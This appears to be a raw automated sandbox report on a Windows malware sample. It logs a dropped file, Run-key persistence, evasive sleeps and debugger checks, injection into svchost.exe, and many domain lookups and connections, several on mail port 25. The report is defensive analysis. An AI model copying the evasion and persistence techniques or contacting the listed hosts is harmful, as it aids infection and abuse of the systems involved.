                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\svchost.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\ParametersJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\pigalicapi.exeStalling execution: Execution stalls by calling Sleepgraph_4-4658
                  Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,4_2_00EC3B00
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exe TID: 6872Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exe TID: 6320Thread sleep time: -21600000s >= -30000sJump to behavior
                  Source: C:\Users\user\pigalicapi.exe TID: 2100Thread sleep time: -21600000s >= -30000sJump to behavior
                  Source: C:\Users\user\pigalicapi.exe TID: 7000Thread sleep time: -21600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5240Thread sleep count: 168 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4464Thread sleep time: -110000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 3192Thread sleep count: 129 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 22760Thread sleep time: -45000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4124Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 6612Thread sleep count: 962 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 6616Thread sleep count: 931 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 3456Thread sleep time: -106455s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 3456Thread sleep time: -109090s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 860Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 788Thread sleep count: 757 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 3788Thread sleep count: 764 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5700Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4120Thread sleep count: 387 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 3716Thread sleep count: 400 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 6108Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 22724Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 22792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 22932Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 23112Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 23436Thread sleep count: 179 > 30
                  Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-5036
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,4_2_00EC1CA0
                  Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 962
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 931
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 757
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 764
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 387
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 400
                  Source: C:\Users\user\pigalicapi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-4738
                  Source: C:\Users\user\pigalicapi.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-5016
                  Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,4_2_00EC9F70
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,4_2_00EC8F80
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E1989 FindFirstFileExW,0_2_010E1989
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E5EA0 FindFirstFileA,0_2_010E5EA0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F01989 FindFirstFileExW,3_2_00F01989
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F05EA0 FindFirstFileA,3_2_00F05EA0
                  Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 106455
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 109090
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeAPI call chain: ExitProcess graph end nodegraph_0-8077
                  Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_3-8066
                  Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_4-4627
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: CX17SY6xF6.exe, 00000000.00000003.683017666.0000000007186000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
                  Source: CX17SY6xF6.exe, 00000000.00000003.683017666.0000000007186000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 00000010.00000002.860125258.0000000003000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DDD8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_010DDD8F
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,4_2_00EC1CA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,5_2_0408BF20
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DC777 GetProcessHeap,0_2_010DC777
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DC1C9 mov eax, dword ptr fs:[00000030h]0_2_010DC1C9
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EFC1C9 mov eax, dword ptr fs:[00000030h]3_2_00EFC1C9
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC3090 mov eax, dword ptr fs:[00000030h]4_2_00EC3090
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00ECEF90 mov eax, dword ptr fs:[00000030h]4_2_00ECEF90
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00E42000 mov eax, dword ptr fs:[00000030h]4_2_00E42000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00401005 mov eax, dword ptr fs:[00000030h]5_2_00401005
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04001A30 mov eax, dword ptr fs:[00000030h]5_2_04001A30
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DDEDD SetUnhandledExceptionFilter,0_2_010DDEDD
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DDD8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_010DDD8F
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D95A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_010D95A0
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DDF9B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_010DDF9B
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EFDEDD SetUnhandledExceptionFilter,3_2_00EFDEDD
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF95A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00EF95A0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EFDD8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00EFDD8F
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EFDF9B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00EFDF9B
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC3B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,4_2_00EC3B00

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.74.184.61 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.55.214 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 37.59.243.164 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.163.45.187 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.30.14 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 88.86.118.82 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.19.218.80 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.107 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.145 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 141.193.213.20 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.186.33.16 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.130.159 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.42.191.40 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 127.0.0.11 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cnti.krsn.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.145.148 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.94.166.30 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cyclad.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.synetik.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.38 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.29.72 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.187 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.94.41.167 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.221.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.18.40.43 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.13 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.91.197.46 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.8.8.200 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.76.27.77 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.10.34 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.220 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hubbikes.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.224 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
